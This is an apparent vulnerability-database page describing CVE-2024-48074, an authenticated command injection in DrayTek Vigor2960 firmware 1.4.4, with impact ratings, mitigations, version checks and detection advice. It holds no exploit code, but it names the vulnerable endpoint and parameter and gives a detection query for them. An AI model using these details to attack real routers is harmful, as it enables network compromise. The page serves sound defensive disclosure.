Login Sign Up

CVE-2024-48074

8.0 HIGH
Remote Code Execution

📋 TL;DR

This vulnerability allows authenticated attackers to execute arbitrary commands on DrayTek Vigor2960 routers by injecting malicious commands into the table parameter of the doPPPoE function. Attackers with valid credentials can achieve remote code execution, potentially compromising the entire router and connected networks. Only DrayTek Vigor2960 routers running version 1.4.4 are affected.

💻 Affected Systems

Products:
  • DrayTek Vigor2960
Versions: Version 1.4.4
Operating Systems: Embedded router OS
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated access to the router's web interface. Default credentials may increase risk if not changed.

📦 What is this software?

Vigor2960 Firmware by Draytek

View all CVEs affecting Vigor2960 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete router compromise allowing attacker to intercept all network traffic, pivot to internal networks, install persistent backdoors, and use router as attack launch point.

🟠

Likely Case

Router takeover enabling traffic interception, credential theft, network reconnaissance, and potential lateral movement to connected devices.

🟢

If Mitigated

Limited impact if strong authentication controls, network segmentation, and proper monitoring are in place to detect and block exploitation attempts.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires authentication but is straightforward to execute once credentials are obtained. Public proof-of-concept code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Unknown

Restart Required: No

Instructions:

Check DrayTek official website for firmware updates. If patch is available, download latest firmware and upload via router web interface under System Maintenance > Firmware Upgrade.

🔧 Temporary Workarounds

Disable remote management

all

Prevent external access to router management interface

Change default credentials

all

Use strong, unique passwords for router admin accounts

🧯 If You Can't Patch

  • Implement network segmentation to isolate router management interface
  • Deploy network monitoring to detect command injection attempts

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in web interface under System Maintenance > Firmware Information. If version is 1.4.4, router is vulnerable.

Check Version:

No CLI command available. Check via web interface at System Maintenance > Firmware Information

Verify Fix Applied:

Verify firmware version has been updated to a version later than 1.4.4

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in router logs
  • Multiple failed authentication attempts followed by successful login
  • Unexpected system function calls

Network Indicators:

  • Unusual outbound connections from router
  • Traffic patterns suggesting router compromise
  • Anomalous management interface access

SIEM Query:

Search for: 'mainfunction.cgi' AND 'doPPPoE' AND 'table' in web server logs

📊 Metadata

CVE ID: CVE-2024-48074
CVSS v3 Score: 8.0 (HIGH)
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: October 28, 2024
Last Updated: May 17, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-48074, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)